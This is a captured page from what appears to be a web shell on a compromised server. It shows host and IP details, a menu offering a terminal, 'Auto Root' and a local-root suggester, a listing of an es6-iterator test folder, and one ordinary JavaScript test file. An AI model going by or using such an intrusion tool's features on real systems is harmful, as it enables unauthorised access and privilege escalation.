Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.221.21.111
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
wb /
node_modules /
es6-iterator /
test /
Delete
Unzip
Name
Size
Permission
Date
Action
#
[ DIR ]
drwxrwxr-x
2022-08-30 11:49
.eslintrc.json
44
B
-rw-rw-r--
2022-08-30 11:49
array.js
2.53
KB
-rw-rw-r--
2022-08-30 11:49
for-of.js
1.17
KB
-rw-rw-r--
2022-08-30 11:49
get.js
698
B
-rw-rw-r--
2022-08-30 11:49
index.js
3.43
KB
-rw-rw-r--
2022-08-30 11:49
is-iterable.js
568
B
-rw-rw-r--
2022-08-30 11:49
string.js
848
B
-rw-rw-r--
2022-08-30 11:49
valid-iterable.js
566
B
-rw-rw-r--
2022-08-30 11:49
Save
Rename
"use strict"; var iteratorSymbol = require("es6-symbol").iterator , Iterator = require("../"); module.exports = function (t, a) { var iterator; a.throws(function () { t(); }, TypeError, "Null"); a.throws(function () { t({}); }, TypeError, "Plain object"); a.throws(function () { t({ length: 0 }); }, TypeError, "Array-like"); iterator = {}; iterator[iteratorSymbol] = function () { return new Iterator([]); }; a(t(iterator) instanceof Iterator, true, "Iterator"); a(String(t([])), "[object Array Iterator]", " Array"); a(String(t(function () { return arguments; }())), "[object Array Iterator]", " Arguments"); a(String(t("foo")), "[object String Iterator]", "String"); };